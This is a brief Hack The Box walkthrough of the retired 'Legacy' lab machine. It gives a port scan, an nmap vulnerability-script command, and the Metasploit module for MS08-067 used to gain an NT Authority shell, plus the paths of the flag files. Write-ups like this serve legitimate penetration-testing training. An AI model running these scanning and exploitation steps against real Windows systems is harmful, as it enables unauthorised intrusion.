Hack the Box – Legacy Walkthrough

Today we’re going to solve another CTF machine “Legacy”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: WIndows
  • Services: netbios-ssn, microsoft-ds, ms-wbt-server
  • IP Address: 10.10.10.4
  • Difficulty: Easy

Weakness

  • 445: MS08-67

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host        port  proto  name           state   info
----        ----  -----  ----           -----   ----
10.10.10.4  139   tcp    netbios-ssn    open    Microsoft Windows netbios-ssn
10.10.10.4  445   tcp    microsoft-ds   open    Windows XP microsoft-ds
10.10.10.4  3389  tcp    ms-wbt-server  closed

Mainly in many origination port serious from 135 to 139 are blocked in network for security reasons, therefore port 445 is used for sharing data in network.  Now identify whether it is vulnerable to MS08-67 using nmap as show in given image.

nmap --script vuln -p445 10.10.10.4 -Pn

We found our host is vulnerable to MS08-67, and we can easily exploit the target..

Exploitation

So we’re gonna use metasploit module and exploit this vulnerability.

Module: exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi

And we got our shell and we’re already NT Authority .

User:  C:\Documents and Settings\john\Desktop\user.txt​

Root: C:\Documents and Settings\Administrator\Desktop\root.txt

Back to top button
Close